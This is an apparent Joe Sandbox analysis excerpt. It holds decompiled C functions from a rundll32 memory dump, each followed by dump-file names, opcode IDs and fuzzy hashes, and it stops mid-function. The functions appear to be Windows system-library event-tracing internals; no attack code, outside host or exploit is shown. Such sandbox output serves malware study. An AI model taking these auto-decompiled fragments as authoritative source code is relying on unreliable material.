                                                                                            				E0469AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t16 = 0x7ffe0388;
                                                                                            				} else {
                                                                                            					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                            				}
                                                                                            				if( *_t16 != 0) {
                                                                                            					_t16 = E0468FE3F(_t22, _t35, _v8, _v12);
                                                                                            				}
                                                                                            				return _t16;
                                                                                            			}












                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: db2c18f1da7dad3101a078b1289e542930ad1caff04113f7ff3c125430b651e1
                                                                                            • Instruction ID: 00a8105317e8a4cde3c28c66cd9407302a988ec729b871318d2bf3dfa5d52aeb
                                                                                            • Opcode Fuzzy Hash: db2c18f1da7dad3101a078b1289e542930ad1caff04113f7ff3c125430b651e1
                                                                                            • Instruction Fuzzy Hash: BA012872604B41AFD710EF68C904B5A77D5AB85314F048619F88583391FE34FD50CB96
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E045EB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                                                            				signed char _t11;
                                                                                            				signed char* _t12;
                                                                                            				intOrPtr _t24;
                                                                                            				signed short* _t25;
                                                                                            
                                                                                            				_t25 = __edx;
                                                                                            				_t24 = __ecx;
                                                                                            				_t11 = ( *[fs:0x30])[0x50];
                                                                                            				if(_t11 != 0) {
                                                                                            					if( *_t11 == 0) {
                                                                                            						goto L1;
                                                                                            					}
                                                                                            					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                            					L2:
                                                                                            					if( *_t12 != 0) {
                                                                                            						_t12 =  *[fs:0x30];
                                                                                            						if((_t12[0x240] & 0x00000004) == 0) {
                                                                                            							goto L3;
                                                                                            						}
                                                                                            						if(E045F7D50() == 0) {
                                                                                            							_t12 = 0x7ffe0385;
                                                                                            						} else {
                                                                                            							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                            						}
                                                                                            						if(( *_t12 & 0x00000020) == 0) {
                                                                                            							goto L3;
                                                                                            						}
                                                                                            						return E04657016(_a4, _t24, 0, 0, _t25, 0);
                                                                                            					}
                                                                                            					L3:
                                                                                            					return _t12;
                                                                                            				}
                                                                                            				L1:
                                                                                            				_t12 = 0x7ffe0384;
                                                                                            				goto L2;
                                                                                            			}








                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                            • Instruction ID: 8eb441ea93039b77c1502a888068dfc839e9d9b12e5e4275fb873e761b148d1c
                                                                                            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                            • Instruction Fuzzy Hash: B601BC32301980DFD326CB9DC888F7677E8FB46755F0900A1E919CBA61E628FC40E221
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 59%
                                                                                            			E0468FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                            				signed int _v12;
                                                                                            				intOrPtr _v24;
                                                                                            				intOrPtr _v28;
                                                                                            				intOrPtr _v32;
                                                                                            				short _v58;
                                                                                            				char _v64;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				signed char* _t18;
                                                                                            				intOrPtr _t24;
                                                                                            				intOrPtr _t30;
                                                                                            				intOrPtr _t31;
                                                                                            				signed int _t32;
                                                                                            
                                                                                            				_t29 = __edx;
                                                                                            				_t24 = __ebx;
                                                                                            				_v12 =  *0x46cd360 ^ _t32;
                                                                                            				_t30 = __edx;
                                                                                            				_t31 = __ecx;
                                                                                            				E0461FA60( &_v64, 0, 0x30);
                                                                                            				_v24 = _a4;
                                                                                            				_v32 = _t31;
                                                                                            				_v28 = _t30;
                                                                                            				_v58 = 0x267;
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t18 = 0x7ffe0388;
                                                                                            				} else {
                                                                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                            				}
                                                                                            				_push( &_v64);
                                                                                            				_push(0x10);
                                                                                            				_push(0x20402);
                                                                                            				_push( *_t18 & 0x000000ff);
                                                                                            				return E0461B640(E04619AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                                            			}

















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2c4a710f635a9639db43d1790d2922fe411619bcce4323434ba0f5dc968adc41
                                                                                            • Instruction ID: 4ab1a350b2d85c3969b98981b25093d111ea7b1011d70d50082c51fdf9d026e6
                                                                                            • Opcode Fuzzy Hash: 2c4a710f635a9639db43d1790d2922fe411619bcce4323434ba0f5dc968adc41
                                                                                            • Instruction Fuzzy Hash: B3018471E00248ABDB14EFA9D845FAEB7B8EF44714F04406AB904EB391EA74A901C795
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 59%
                                                                                            			E0468FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                            				signed int _v12;
                                                                                            				intOrPtr _v24;
                                                                                            				intOrPtr _v28;
                                                                                            				intOrPtr _v32;
                                                                                            				short _v58;
                                                                                            				char _v64;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				signed char* _t18;
                                                                                            				intOrPtr _t24;
                                                                                            				intOrPtr _t30;
                                                                                            				intOrPtr _t31;
                                                                                            				signed int _t32;
                                                                                            
                                                                                            				_t29 = __edx;
                                                                                            				_t24 = __ebx;
                                                                                            				_v12 =  *0x46cd360 ^ _t32;
                                                                                            				_t30 = __edx;
                                                                                            				_t31 = __ecx;
                                                                                            				E0461FA60( &_v64, 0, 0x30);
                                                                                            				_v24 = _a4;
                                                                                            				_v32 = _t31;
                                                                                            				_v28 = _t30;
                                                                                            				_v58 = 0x266;
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t18 = 0x7ffe0388;
                                                                                            				} else {
                                                                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                            				}
                                                                                            				_push( &_v64);
                                                                                            				_push(0x10);
                                                                                            				_push(0x20402);
                                                                                            				_push( *_t18 & 0x000000ff);
                                                                                            				return E0461B640(E04619AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                                            			}

















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 559200d49f9716058f5f5f26456eefb0c98f77b087aaa7eb88bb3c822c6586ed
                                                                                            • Instruction ID: 375e5fa790a0e6739c9df4ddd7a88f84e29f06db04b8a3a559c8d00daf2bb501
                                                                                            • Opcode Fuzzy Hash: 559200d49f9716058f5f5f26456eefb0c98f77b087aaa7eb88bb3c822c6586ed
                                                                                            • Instruction Fuzzy Hash: 4301D471E00208ABDB14EBA9D845FAEB7B8EF44700F04406AB900EB390FA34AA01C794
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 54%
                                                                                            			E046A8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                            				signed int _v12;
                                                                                            				intOrPtr _v24;
                                                                                            				intOrPtr _v28;
                                                                                            				intOrPtr _v32;
                                                                                            				intOrPtr _v36;
                                                                                            				intOrPtr _v40;
                                                                                            				short _v66;
                                                                                            				char _v72;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				signed char* _t18;
                                                                                            				signed int _t32;
                                                                                            
                                                                                            				_t29 = __edx;
                                                                                            				_v12 =  *0x46cd360 ^ _t32;
                                                                                            				_t31 = _a8;
                                                                                            				_t30 = _a12;
                                                                                            				_v66 = 0x1c20;
                                                                                            				_v40 = __ecx;
                                                                                            				_v36 = __edx;
                                                                                            				_v32 = _a4;
                                                                                            				_v28 = _a8;
                                                                                            				_v24 = _a12;
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t18 = 0x7ffe0386;
                                                                                            				} else {
                                                                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                            				}
                                                                                            				_push( &_v72);
                                                                                            				_push(0x14);
                                                                                            				_push(0x20402);
                                                                                            				_push( *_t18 & 0x000000ff);
                                                                                            				return E0461B640(E04619AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                                                                            			}

















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8cb461c4d7078be9d72e365ee16879db07f582556c06ac27fc2f0963b3a8adc8
                                                                                            • Instruction ID: c1db61cc5b843a94041ad9812aad8f8d53bee120c4adef261d47d09deb298fb5
                                                                                            • Opcode Fuzzy Hash: 8cb461c4d7078be9d72e365ee16879db07f582556c06ac27fc2f0963b3a8adc8
                                                                                            • Instruction Fuzzy Hash: E0012CB1A0021DAFDB00EFA9D9459AEB7B8FF48710F14405AFA04E7351E634AD11CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 54%
                                                                                            			E046A8ED6(intOrPtr __ecx, intOrPtr __edx) {
                                                                                            				signed int _v8;
                                                                                            				signed int _v12;
                                                                                            				intOrPtr _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				intOrPtr _v28;
                                                                                            				intOrPtr _v32;
                                                                                            				intOrPtr _v36;
                                                                                            				short _v62;
                                                                                            				char _v68;
                                                                                            				signed char* _t29;
                                                                                            				intOrPtr _t35;
                                                                                            				intOrPtr _t41;
                                                                                            				intOrPtr _t42;
                                                                                            				signed int _t43;
                                                                                            
                                                                                            				_t40 = __edx;
                                                                                            				_v8 =  *0x46cd360 ^ _t43;
                                                                                            				_v28 = __ecx;
                                                                                            				_v62 = 0x1c2a;
                                                                                            				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                                                                            				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                                                                            				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                                                                            				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                                                                            				_v24 = __edx;
                                                                                            				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t29 = 0x7ffe0386;
                                                                                            				} else {
                                                                                            					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                            				}
                                                                                            				_push( &_v68);
                                                                                            				_push(0x1c);
                                                                                            				_push(0x20402);
                                                                                            				_push( *_t29 & 0x000000ff);
                                                                                            				return E0461B640(E04619AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                                                                            			}



















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 71a5c0249f0d0eca7df52e84e850759e2a957aea1d227926a2f0a38027935d54
                                                                                            • Instruction ID: 76d9dd17a7f5d8c83de00f0156e2e044be24f24d60dc6d472e89c5e70e172d19
                                                                                            • Opcode Fuzzy Hash: 71a5c0249f0d0eca7df52e84e850759e2a957aea1d227926a2f0a38027935d54
                                                                                            • Instruction Fuzzy Hash: 44111E70E006099FDB04DFA9D541BAEB7F4FF08300F0442AAE918EB381E634A941CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E045DDB60(signed int __ecx) {
                                                                                            				intOrPtr* _t9;
                                                                                            				void* _t12;
                                                                                            				void* _t13;
                                                                                            				intOrPtr _t14;
                                                                                            
                                                                                            				_t9 = __ecx;
                                                                                            				_t14 = 0;
                                                                                            				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                                                                            					_t13 = 0xc000000d;
                                                                                            				} else {
                                                                                            					_t14 = E045DDB40();
                                                                                            					if(_t14 == 0) {
                                                                                            						_t13 = 0xc0000017;
                                                                                            					} else {
                                                                                            						_t13 = E045DE7B0(__ecx, _t12, _t14, 0xfff);
                                                                                            						if(_t13 < 0) {
                                                                                            							L045DE8B0(__ecx, _t14, 0xfff);
                                                                                            							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                                                            							_t14 = 0;
                                                                                            						} else {
                                                                                            							_t13 = 0;
                                                                                            							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            				 *_t9 = _t14;
                                                                                            				return _t13;
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                            • Instruction ID: e3975c4efbfb2b47ffa52f21f69e9b8bbd1b1c0104a6a86ba2a52feb5de4418a
                                                                                            • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                            • Instruction Fuzzy Hash: 4EF0C8332419639BF3725A5D8880B67A6A5AFC1A68F150435F1059B244C964B806BED1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E045DB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                                                            				signed char* _t13;
                                                                                            				intOrPtr _t22;
                                                                                            				char _t23;
                                                                                            
                                                                                            				_t23 = __edx;
                                                                                            				_t22 = __ecx;
                                                                                            				if(E045F7D50() != 0) {
                                                                                            					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                            				} else {
                                                                                            					_t13 = 0x7ffe0384;
                                                                                            				}
                                                                                            				if( *_t13 != 0) {
                                                                                            					_t13 =  *[fs:0x30];
                                                                                            					if((_t13[0x240] & 0x00000004) == 0) {
                                                                                            						goto L3;
                                                                                            					}
                                                                                            					if(E045F7D50() == 0) {
                                                                                            						_t13 = 0x7ffe0385;
                                                                                            					} else {
                                                                                            						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                            					}
                                                                                            					if(( *_t13 & 0x00000020) == 0) {
                                                                                            						goto L3;
                                                                                            					}
                                                                                            					return E04657016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                                                            				} else {
                                                                                            					L3:
                                                                                            					return _t13;
                                                                                            				}
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                            • Instruction ID: 357f5a0c4e42c9ca60d27b0cea8dd965c2a483eead9cadba26421be34481580c
                                                                                            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                            • Instruction Fuzzy Hash: 4B018132200680ABD3329B5DC804F69BB99FF95754F0A44A2FA158B7B5EA79F840E315
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 46%
                                                                                            			E0466FE87(intOrPtr __ecx) {
                                                                                            				signed int _v8;
                                                                                            				intOrPtr _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				signed int _v24;
                                                                                            				intOrPtr _v28;
                                                                                            				short _v54;
                                                                                            				char _v60;
                                                                                            				signed char* _t21;
                                                                                            				intOrPtr _t27;
                                                                                            				intOrPtr _t32;
                                                                                            				intOrPtr _t33;
                                                                                            				intOrPtr _t34;
                                                                                            				signed int _t35;
                                                                                            
                                                                                            				_v8 =  *0x46cd360 ^ _t35;
                                                                                            				_v16 = __ecx;
                                                                                            				_v54 = 0x1722;
                                                                                            				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                                                                            				_v28 =  *((intOrPtr*)(__ecx + 4));
                                                                                            				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t21 = 0x7ffe0382;
                                                                                            				} else {
                                                                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                                                                            				}
                                                                                            				_push( &_v60);
                                                                                            				_push(0x10);
                                                                                            				_push(0x20402);
                                                                                            				_push( *_t21 & 0x000000ff);
                                                                                            				return E0461B640(E04619AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7eb6c19fb78a5807ebfebe42c663049a6b15ccdf197d902a87214d445caaaebf
                                                                                            • Instruction ID: 9a357485c2e9e962745722470812a0fd4387052d206966499744cadf43e3c6a1
                                                                                            • Opcode Fuzzy Hash: 7eb6c19fb78a5807ebfebe42c663049a6b15ccdf197d902a87214d445caaaebf
                                                                                            • Instruction Fuzzy Hash: 9D016270A00208AFCB14DFA8D541A6EBBF4FF08304F144169A505DB392E635E902CB84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 48%
                                                                                            			E046A8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                            				signed int _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				intOrPtr _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				short _v50;
                                                                                            				char _v56;
                                                                                            				signed char* _t18;
                                                                                            				intOrPtr _t24;
                                                                                            				intOrPtr _t30;
                                                                                            				intOrPtr _t31;
                                                                                            				signed int _t32;
                                                                                            
                                                                                            				_t29 = __edx;
                                                                                            				_v8 =  *0x46cd360 ^ _t32;
                                                                                            				_v16 = __ecx;
                                                                                            				_v50 = 0x1c2c;
                                                                                            				_v24 = _a4;
                                                                                            				_v20 = _a8;
                                                                                            				_v12 = __edx;
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t18 = 0x7ffe0386;
                                                                                            				} else {
                                                                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                            				}
                                                                                            				_push( &_v56);
                                                                                            				_push(0x10);
                                                                                            				_push(0x402);
                                                                                            				_push( *_t18 & 0x000000ff);
                                                                                            				return E0461B640(E04619AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • Opcode ID: 97c56553868df5ec26a897245038c9a801b5b3862a6f820f940104d0935cce7c
                                                                                            • Instruction ID: 4010628ec88bab270f663f1e7d697745009ab949aaf9dd964187e6cf1ed5b447
                                                                                            • Opcode Fuzzy Hash: 97c56553868df5ec26a897245038c9a801b5b3862a6f820f940104d0935cce7c
                                                                                            • Instruction Fuzzy Hash: 31013174A00209AFDB00EFA8D545AAEB7B4FF58300F50405AB905EB391EA34EA10DB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 48%
                                                                                            			E0469131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                            				signed int _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				intOrPtr _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				short _v50;
                                                                                            				char _v56;
                                                                                            				signed char* _t18;
                                                                                            				intOrPtr _t24;
                                                                                            				intOrPtr _t30;
                                                                                            				intOrPtr _t31;
                                                                                            				signed int _t32;
                                                                                            
                                                                                            				_t29 = __edx;
                                                                                            				_v8 =  *0x46cd360 ^ _t32;
                                                                                            				_v20 = _a4;
                                                                                            				_v12 = _a8;
                                                                                            				_v24 = __ecx;
                                                                                            				_v16 = __edx;
                                                                                            				_v50 = 0x1021;
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t18 = 0x7ffe0380;
                                                                                            				} else {
                                                                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                            				}
                                                                                            				_push( &_v56);
                                                                                            				_push(0x10);
                                                                                            				_push(0x20402);
                                                                                            				_push( *_t18 & 0x000000ff);
                                                                                            				return E0461B640(E04619AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                            			}
















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • Opcode ID: 2a54dbc80f65dbfacd61f26f51d3da13a4b84f4c479b7d00ca6ecee8577632f8
                                                                                            • Instruction ID: 3837a1f811417d6d1b57373b8b4f82adc5c801e8e85729cd38dc4ad8b4c598ab
                                                                                            • Opcode Fuzzy Hash: 2a54dbc80f65dbfacd61f26f51d3da13a4b84f4c479b7d00ca6ecee8577632f8
                                                                                            • Instruction Fuzzy Hash: 1A013171A0120DAFDB04DFA9D545AAEB7F4FF48700F50405AB945EB351E674AA00CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 46%
                                                                                            			E04691608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                            				signed int _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				intOrPtr _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				short _v46;
                                                                                            				char _v52;
                                                                                            				signed char* _t15;
                                                                                            				intOrPtr _t21;
                                                                                            				intOrPtr _t27;
                                                                                            				intOrPtr _t28;
                                                                                            				signed int _t29;
                                                                                            
                                                                                            				_t26 = __edx;
                                                                                            				_v8 =  *0x46cd360 ^ _t29;
                                                                                            				_v12 = _a4;
                                                                                            				_v20 = __ecx;
                                                                                            				_v16 = __edx;
                                                                                            				_v46 = 0x1024;
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t15 = 0x7ffe0380;
                                                                                            				} else {
                                                                                            					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                            				}
                                                                                            				_push( &_v52);
                                                                                            				_push(0xc);
                                                                                            				_push(0x20402);
                                                                                            				_push( *_t15 & 0x000000ff);
                                                                                            				return E0461B640(E04619AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                                                                            			}















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • Opcode ID: 86b41e1649b3346a6e8d0b74c439efbc8640e1e74b1ce23c5f7a04b015a5f3ba
                                                                                            • Instruction ID: 631224fc7e02d1bd4f9c42af7ee00d0ffc62649811552ef527f8d4680f44bd52
                                                                                            • Opcode Fuzzy Hash: 86b41e1649b3346a6e8d0b74c439efbc8640e1e74b1ce23c5f7a04b015a5f3ba
                                                                                            • Instruction Fuzzy Hash: ABF06271E00248EFDB04DFA9D415AAEB7F8FF19300F444069A905EB391F674AD00CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E045FC577(void* __ecx, char _a4) {
                                                                                            				void* __esi;
                                                                                            				void* __ebp;
                                                                                            				void* _t17;
                                                                                            				void* _t19;
                                                                                            				void* _t20;
                                                                                            				void* _t21;
                                                                                            
                                                                                            				_t18 = __ecx;
                                                                                            				_t21 = __ecx;
